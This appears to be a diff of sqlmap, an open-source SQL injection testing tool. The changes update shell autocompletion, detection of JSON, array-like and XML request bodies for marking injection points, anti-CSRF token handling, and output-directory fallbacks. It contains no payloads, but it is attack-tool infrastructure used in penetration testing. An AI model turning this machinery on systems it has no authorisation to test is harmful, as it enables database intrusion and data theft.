return
|
return
|
||||||
|
|
||||||
if osShell:
|
if completion == AUTOCOMPLETE_TYPE.OS:
|
||||||
if Backend.isOs(OS.WINDOWS):
|
if os == OS.WINDOWS:
|
||||||
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
# Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands
|
||||||
completer = CompleterNG({
|
completer = CompleterNG({
|
||||||
"copy": None, "del": None, "dir": None,
|
"copy": None, "del": None, "dir": None,
|
||||||
|
@ -75,5 +119,11 @@ def autoCompletion(sqlShell=False, osShell=False):
|
||||||
readline.set_completer(completer.complete)
|
readline.set_completer(completer.complete)
|
||||||
readline.parse_and_bind("tab: complete")
|
readline.parse_and_bind("tab: complete")
|
||||||
|
|
||||||
loadHistory()
|
elif commands:
|
||||||
atexit.register(saveHistory)
|
completer = CompleterNG(dict(((_, None) for _ in commands)))
|
||||||
|
readline.set_completer_delims(' ')
|
||||||
|
readline.set_completer(completer.complete)
|
||||||
|
readline.parse_and_bind("tab: complete")
|
||||||
|
|
||||||
|
loadHistory(completion)
|
||||||
|
atexit.register(saveHistory, completion)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -120,7 +120,7 @@ class Popen(subprocess.Popen):
|
||||||
nAvail = maxsize
|
nAvail = maxsize
|
||||||
if nAvail > 0:
|
if nAvail > 0:
|
||||||
(errCode, read) = ReadFile(x, nAvail, None)
|
(errCode, read) = ReadFile(x, nAvail, None)
|
||||||
except ValueError:
|
except (ValueError, NameError):
|
||||||
return self._close(which)
|
return self._close(which)
|
||||||
except (subprocess.pywintypes.error, Exception), why:
|
except (subprocess.pywintypes.error, Exception), why:
|
||||||
if why[0] in (109, errno.ESHUTDOWN):
|
if why[0] in (109, errno.ESHUTDOWN):
|
||||||
|
@ -197,4 +197,6 @@ def send_all(p, data):
|
||||||
|
|
||||||
while len(data):
|
while len(data):
|
||||||
sent = p.send(data)
|
sent = p.send(data)
|
||||||
|
if not isinstance(sent, int):
|
||||||
|
break
|
||||||
data = buffer(data, sent)
|
data = buffer(data, sent)
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -14,8 +14,11 @@ import time
|
||||||
import urlparse
|
import urlparse
|
||||||
|
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import hashDBRetrieve
|
from lib.core.common import hashDBRetrieve
|
||||||
from lib.core.common import intersect
|
from lib.core.common import intersect
|
||||||
|
from lib.core.common import normalizeUnicode
|
||||||
|
from lib.core.common import openFile
|
||||||
from lib.core.common import paramToDict
|
from lib.core.common import paramToDict
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import resetCookieJar
|
from lib.core.common import resetCookieJar
|
||||||
|
@ -25,6 +28,7 @@ from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.data import mergedOptions
|
from lib.core.data import mergedOptions
|
||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
|
from lib.core.datatype import InjectionDict
|
||||||
from lib.core.dicts import DBMS_DICT
|
from lib.core.dicts import DBMS_DICT
|
||||||
from lib.core.dump import dumper
|
from lib.core.dump import dumper
|
||||||
from lib.core.enums import HASHDB_KEYS
|
from lib.core.enums import HASHDB_KEYS
|
||||||
|
@ -36,26 +40,31 @@ from lib.core.exception import SqlmapFilePathException
|
||||||
from lib.core.exception import SqlmapGenericException
|
from lib.core.exception import SqlmapGenericException
|
||||||
from lib.core.exception import SqlmapMissingPrivileges
|
from lib.core.exception import SqlmapMissingPrivileges
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.option import _setDBMS
|
from lib.core.option import _setDBMS
|
||||||
from lib.core.option import _setKnowledgeBaseAttributes
|
from lib.core.option import _setKnowledgeBaseAttributes
|
||||||
from lib.core.option import _setAuthCred
|
from lib.core.option import _setAuthCred
|
||||||
from lib.core.settings import ASTERISK_MARKER
|
from lib.core.settings import ASTERISK_MARKER
|
||||||
|
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import HOST_ALIASES
|
from lib.core.settings import HOST_ALIASES
|
||||||
|
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
|
||||||
from lib.core.settings import JSON_RECOGNITION_REGEX
|
from lib.core.settings import JSON_RECOGNITION_REGEX
|
||||||
|
from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
|
||||||
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
|
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
|
||||||
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
|
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
|
||||||
from lib.core.settings import REFERER_ALIASES
|
from lib.core.settings import REFERER_ALIASES
|
||||||
from lib.core.settings import RESTORE_MERGED_OPTIONS
|
from lib.core.settings import RESTORE_MERGED_OPTIONS
|
||||||
from lib.core.settings import RESULTS_FILE_FORMAT
|
from lib.core.settings import RESULTS_FILE_FORMAT
|
||||||
from lib.core.settings import SOAP_RECOGNITION_REGEX
|
|
||||||
from lib.core.settings import SUPPORTED_DBMS
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
|
||||||
from lib.core.settings import UNICODE_ENCODING
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
from lib.core.settings import UNKNOWN_DBMS_VERSION
|
from lib.core.settings import UNKNOWN_DBMS_VERSION
|
||||||
from lib.core.settings import URI_INJECTABLE_REGEX
|
from lib.core.settings import URI_INJECTABLE_REGEX
|
||||||
from lib.core.settings import USER_AGENT_ALIASES
|
from lib.core.settings import USER_AGENT_ALIASES
|
||||||
|
from lib.core.settings import XML_RECOGNITION_REGEX
|
||||||
from lib.utils.hashdb import HashDB
|
from lib.utils.hashdb import HashDB
|
||||||
from lib.core.xmldump import dumper as xmldumper
|
from lib.core.xmldump import dumper as xmldumper
|
||||||
from thirdparty.odict.odict import OrderedDict
|
from thirdparty.odict.odict import OrderedDict
|
||||||
|
@ -88,6 +97,7 @@ def _setRequestParams():
|
||||||
|
|
||||||
if conf.data is not None:
|
if conf.data is not None:
|
||||||
conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
|
conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method
|
||||||
|
hintNames = []
|
||||||
|
|
||||||
def process(match, repl):
|
def process(match, repl):
|
||||||
retVal = match.group(0)
|
retVal = match.group(0)
|
||||||
|
@ -100,7 +110,8 @@ def _setRequestParams():
|
||||||
retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
|
retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
|
||||||
else:
|
else:
|
||||||
break
|
break
|
||||||
|
if CUSTOM_INJECTION_MARK_CHAR in retVal:
|
||||||
|
hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
|
if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
|
||||||
|
@ -112,9 +123,15 @@ def _setRequestParams():
|
||||||
else:
|
else:
|
||||||
kb.processUserMarks = not test or test[0] not in ("n", "N")
|
kb.processUserMarks = not test or test[0] not in ("n", "N")
|
||||||
|
|
||||||
|
if kb.processUserMarks and "=%s" % CUSTOM_INJECTION_MARK_CHAR in conf.data:
|
||||||
|
warnMsg = "it seems that you've provided empty parameter value(s) "
|
||||||
|
warnMsg += "for testing. Please, always use only valid parameter values "
|
||||||
|
warnMsg += "so sqlmap could be able to run properly"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
|
||||||
if re.search(JSON_RECOGNITION_REGEX, conf.data):
|
if re.search(JSON_RECOGNITION_REGEX, conf.data):
|
||||||
message = "JSON like data found in %s data. " % conf.method
|
message = "JSON data found in %s data. " % conf.method
|
||||||
message += "Do you want to process it? [Y/n/q] "
|
message += "Do you want to process it? [Y/n/q] "
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
if test and test[0] in ("q", "Q"):
|
if test and test[0] in ("q", "Q"):
|
||||||
|
@ -123,10 +140,39 @@ def _setRequestParams():
|
||||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||||
|
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
||||||
|
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
||||||
|
_ = match.group(2)
|
||||||
|
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||||
|
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||||
|
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||||
kb.postHint = POST_HINT.JSON
|
kb.postHint = POST_HINT.JSON
|
||||||
|
|
||||||
elif re.search(SOAP_RECOGNITION_REGEX, conf.data):
|
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||||
message = "SOAP/XML like data found in %s data. " % conf.method
|
message = "JSON-like data found in %s data. " % conf.method
|
||||||
|
message += "Do you want to process it? [Y/n/q] "
|
||||||
|
test = readInput(message, default="Y")
|
||||||
|
if test and test[0] in ("q", "Q"):
|
||||||
|
raise SqlmapUserQuitException
|
||||||
|
elif test[0] not in ("n", "N"):
|
||||||
|
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||||
|
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||||
|
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||||
|
kb.postHint = POST_HINT.JSON_LIKE
|
||||||
|
|
||||||
|
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||||
|
message = "Array-like data found in %s data. " % conf.method
|
||||||
|
message += "Do you want to process it? [Y/n/q] "
|
||||||
|
test = readInput(message, default="Y")
|
||||||
|
if test and test[0] in ("q", "Q"):
|
||||||
|
raise SqlmapUserQuitException
|
||||||
|
elif test[0] not in ("n", "N"):
|
||||||
|
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||||
|
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||||
|
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||||
|
|
||||||
|
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||||
|
message = "SOAP/XML data found in %s data. " % conf.method
|
||||||
message += "Do you want to process it? [Y/n/q] "
|
message += "Do you want to process it? [Y/n/q] "
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
if test and test[0] in ("q", "Q"):
|
if test and test[0] in ("q", "Q"):
|
||||||
|
@ -137,14 +183,14 @@ def _setRequestParams():
|
||||||
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
|
||||||
|
|
||||||
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
|
||||||
message = "Multipart like data found in %s data. " % conf.method
|
message = "Multipart-like data found in %s data. " % conf.method
|
||||||
message += "Do you want to process it? [Y/n/q] "
|
message += "Do you want to process it? [Y/n/q] "
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
if test and test[0] in ("q", "Q"):
|
if test and test[0] in ("q", "Q"):
|
||||||
raise SqlmapUserQuitException
|
raise SqlmapUserQuitException
|
||||||
elif test[0] not in ("n", "N"):
|
elif test[0] not in ("n", "N"):
|
||||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||||
conf.data = re.sub(r"(?si)(Content-Disposition.+?)((\r)?\n--)", r"\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P<name>[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||||
kb.postHint = POST_HINT.MULTIPART
|
kb.postHint = POST_HINT.MULTIPART
|
||||||
|
|
||||||
if not kb.postHint:
|
if not kb.postHint:
|
||||||
|
@ -165,7 +211,7 @@ def _setRequestParams():
|
||||||
|
|
||||||
kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
|
kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
|
||||||
|
|
||||||
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint:
|
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
|
||||||
warnMsg = "you've provided target URL without any GET "
|
warnMsg = "you've provided target URL without any GET "
|
||||||
warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
|
warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
|
||||||
warnMsg += "and without providing any POST parameters "
|
warnMsg += "and without providing any POST parameters "
|
||||||
|
@ -195,6 +241,12 @@ def _setRequestParams():
|
||||||
else:
|
else:
|
||||||
kb.processUserMarks = not test or test[0] not in ("n", "N")
|
kb.processUserMarks = not test or test[0] not in ("n", "N")
|
||||||
|
|
||||||
|
if kb.processUserMarks and "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
|
||||||
|
warnMsg = "it seems that you've provided empty parameter value(s) "
|
||||||
|
warnMsg += "for testing. Please, always use only valid parameter values "
|
||||||
|
warnMsg += "so sqlmap could be able to run properly"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if not kb.processUserMarks:
|
if not kb.processUserMarks:
|
||||||
if place == PLACE.URI:
|
if place == PLACE.URI:
|
||||||
query = urlparse.urlsplit(value).query
|
query = urlparse.urlsplit(value).query
|
||||||
|
@ -230,7 +282,15 @@ def _setRequestParams():
|
||||||
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
|
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
|
||||||
|
|
||||||
for i in xrange(len(parts) - 1):
|
for i in xrange(len(parts) - 1):
|
||||||
conf.paramDict[place]["%s#%d%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
|
name = None
|
||||||
|
if kb.postHint:
|
||||||
|
for ending, _ in hintNames:
|
||||||
|
if parts[i].endswith(ending):
|
||||||
|
name = "%s %s" % (kb.postHint, _)
|
||||||
|
break
|
||||||
|
if name is None:
|
||||||
|
name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
|
||||||
|
conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
|
||||||
|
|
||||||
if place == PLACE.URI and PLACE.GET in conf.paramDict:
|
if place == PLACE.URI and PLACE.GET in conf.paramDict:
|
||||||
del conf.paramDict[PLACE.GET]
|
del conf.paramDict[PLACE.GET]
|
||||||
|
@ -298,13 +358,29 @@ def _setRequestParams():
|
||||||
errMsg += "within the given request data"
|
errMsg += "within the given request data"
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
|
if conf.csrfToken:
|
||||||
|
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
|
||||||
|
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
|
||||||
|
errMsg += "found in provided GET, POST, Cookie or header values"
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
else:
|
||||||
|
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
||||||
|
for parameter in conf.paramDict.get(place, {}):
|
||||||
|
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
|
||||||
|
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
|
||||||
|
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
|
||||||
|
test = readInput(message, default="N")
|
||||||
|
if test and test[0] in ("y", "Y"):
|
||||||
|
conf.csrfToken = parameter
|
||||||
|
break
|
||||||
|
|
||||||
def _setHashDB():
|
def _setHashDB():
|
||||||
"""
|
"""
|
||||||
Check and set the HashDB SQLite file for query resume functionality.
|
Check and set the HashDB SQLite file for query resume functionality.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if not conf.hashDBFile:
|
if not conf.hashDBFile:
|
||||||
conf.hashDBFile = conf.sessionFile or "%s%ssession.sqlite" % (conf.outputPath, os.sep)
|
conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite")
|
||||||
|
|
||||||
if os.path.exists(conf.hashDBFile):
|
if os.path.exists(conf.hashDBFile):
|
||||||
if conf.flushSession:
|
if conf.flushSession:
|
||||||
|
@ -332,7 +408,7 @@ def _resumeHashDBValues():
|
||||||
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
|
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
|
||||||
|
|
||||||
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
|
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
|
||||||
if injection.place in conf.paramDict and \
|
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \
|
||||||
injection.parameter in conf.paramDict[injection.place]:
|
injection.parameter in conf.paramDict[injection.place]:
|
||||||
|
|
||||||
if not conf.tech or intersect(conf.tech, injection.data.keys()):
|
if not conf.tech or intersect(conf.tech, injection.data.keys()):
|
||||||
|
@ -432,8 +508,23 @@ def _setResultsFile():
|
||||||
return
|
return
|
||||||
|
|
||||||
if not conf.resultsFP:
|
if not conf.resultsFP:
|
||||||
conf.resultsFilename = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, time.strftime(RESULTS_FILE_FORMAT).lower())
|
conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower())
|
||||||
conf.resultsFP = codecs.open(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
try:
|
||||||
|
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
||||||
|
except (OSError, IOError), ex:
|
||||||
|
try:
|
||||||
|
warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
|
||||||
|
conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1]
|
||||||
|
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
||||||
|
warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
except IOError, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)
|
conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)
|
||||||
|
|
||||||
logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
|
logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
|
||||||
|
@ -449,7 +540,16 @@ def _createFilesDir():
|
||||||
conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname
|
conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname
|
||||||
|
|
||||||
if not os.path.isdir(conf.filePath):
|
if not os.path.isdir(conf.filePath):
|
||||||
os.makedirs(conf.filePath, 0755)
|
try:
|
||||||
|
os.makedirs(conf.filePath, 0755)
|
||||||
|
except OSError, ex:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmapfiles")
|
||||||
|
warnMsg = "unable to create files directory "
|
||||||
|
warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex))
|
||||||
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
conf.filePath = tempDir
|
||||||
|
|
||||||
def _createDumpDir():
|
def _createDumpDir():
|
||||||
"""
|
"""
|
||||||
|
@ -462,7 +562,16 @@ def _createDumpDir():
|
||||||
conf.dumpPath = paths.SQLMAP_DUMP_PATH % conf.hostname
|
conf.dumpPath = paths.SQLMAP_DUMP_PATH % conf.hostname
|
||||||
|
|
||||||
if not os.path.isdir(conf.dumpPath):
|
if not os.path.isdir(conf.dumpPath):
|
||||||
os.makedirs(conf.dumpPath, 0755)
|
try:
|
||||||
|
os.makedirs(conf.dumpPath, 0755)
|
||||||
|
except OSError, ex:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdump")
|
||||||
|
warnMsg = "unable to create dump directory "
|
||||||
|
warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex))
|
||||||
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
conf.dumpPath = tempDir
|
||||||
|
|
||||||
def _configureDumper():
|
def _configureDumper():
|
||||||
if hasattr(conf, 'xmlFile') and conf.xmlFile:
|
if hasattr(conf, 'xmlFile') and conf.xmlFile:
|
||||||
|
@ -479,26 +588,45 @@ def _createTargetDirs():
|
||||||
|
|
||||||
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
|
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
|
||||||
try:
|
try:
|
||||||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
|
||||||
except OSError, ex:
|
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
||||||
warnMsg = "unable to create default root output directory "
|
logger.warn(warnMsg)
|
||||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
|
except (OSError, IOError), ex:
|
||||||
warnMsg += "using temporary directory '%s' instead" % tempDir
|
try:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||||
|
except Exception, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
|
warnMsg = "unable to create regular output directory "
|
||||||
|
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
|
||||||
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
paths.SQLMAP_OUTPUT_PATH = tempDir
|
||||||
|
|
||||||
conf.outputPath = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, conf.hostname)
|
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||||
|
|
||||||
if not os.path.isdir(conf.outputPath):
|
if not os.path.isdir(conf.outputPath):
|
||||||
try:
|
try:
|
||||||
os.makedirs(conf.outputPath, 0755)
|
os.makedirs(conf.outputPath, 0755)
|
||||||
except OSError, ex:
|
except (OSError, IOError), ex:
|
||||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
try:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||||
|
except Exception, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
warnMsg = "unable to create output directory "
|
warnMsg = "unable to create output directory "
|
||||||
warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
|
warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex))
|
||||||
warnMsg += "using temporary directory '%s' instead" % tempDir
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
conf.outputPath = tempDir
|
conf.outputPath = tempDir
|
||||||
|
@ -508,9 +636,9 @@ def _createTargetDirs():
|
||||||
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
|
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
|
||||||
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
|
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
|
||||||
if conf.data:
|
if conf.data:
|
||||||
f.write("\n\n%s" % conf.data)
|
f.write("\n\n%s" % getUnicode(conf.data))
|
||||||
except IOError, ex:
|
except IOError, ex:
|
||||||
if "denied" in str(ex):
|
if "denied" in getUnicode(ex):
|
||||||
errMsg = "you don't have enough permissions "
|
errMsg = "you don't have enough permissions "
|
||||||
else:
|
else:
|
||||||
